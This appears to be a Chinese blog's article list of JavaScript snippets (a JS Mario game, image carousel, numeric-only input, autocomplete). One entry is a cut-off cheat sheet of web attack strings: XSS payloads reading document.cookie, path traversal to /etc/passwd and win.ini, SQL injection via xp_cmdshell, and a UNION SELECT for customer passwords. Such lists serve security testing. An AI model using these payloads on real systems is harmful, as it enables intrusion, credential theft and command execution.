文章列表

[js]JS写的马里奥

Javascript Super Mario,一时手痒扒下来了。此人颇强,用JS代码写了一个顶蘑菇... 阅读全文

[XSS]跨站测试语句总结

, ,
[XSS]跨站测试语句总结 '><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert('XSS')</script> <img src="javascript:alert('XSS')"> %0a%0a<script>alert(\"Vulnerable\")</script>.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html %3f.jsp %3f.jsp &lt;script&gt;alert('Vulnerable');&lt;/script&gt <script>alert('Vulnerable')</script> ?sql_debug=1 a%5c.aspx a.jsp/<script>alert('Vulnerable')</script> a/ a?<script>alert('Vulnerable')</script> "><script>alert('Vulnerable')</script> ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cscript%3Ealert(document. domain);%3C/script%3E& %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= ../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"<XSS>=&{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG 阅读全文

[js]准确获得页面的高度以及宽度

原文出处:http://www.cnblogs.com/huqingyu/archive/2006/11/09/446712.html根据出处的网友评论已经修改了源代码。 阅读全文

[js]屏蔽鼠标右键

彻底屏蔽鼠标右键 阅读全文

[js]CCTV首页图片轮换

, , ,
花了宝贵的一刻钟把CCTV的图片轮换给扣下来了。突然发现使用的jq的未加密库,缺陷是里面有好多废代码,优点是html文档内的加载顺序,先是css文件的渲染,再是jq的库,接着是主要的展示div,最后是应用的js轮换代码。附件:[cctv.rar](88030 Byte) 阅读全文

[js]只能输入数字

[js]只能输入数字 isNumber = function(e) { if ($.browser.msie) { if (((event.keyCode > 47) && (event.keyCode < 58)) || (event.keyCode == 8)) { return true; } else { return false; } } else { if (((e.which > 47) && (e.which < 58)) || (e.which == 8)) { return true; } else { return false; } } } <input type="text" onkeypress="javascript:return isNumber(event);"> // I 阅读全文

[js]ajax加载的脚本不执行

, ,
在问题文档中输入即可 阅读全文

[HTML]雅虎网页播放器

, , ,
具体内容,详见[http://developer.yahoo.com/mediaplayer/] 阅读全文

[js]自动完成控件

, ,
网站地址:[http://www.brandspankingnew.net/specials/ajax_autosuggest/ajax_autosuggest_autocomplete.html] 阅读全文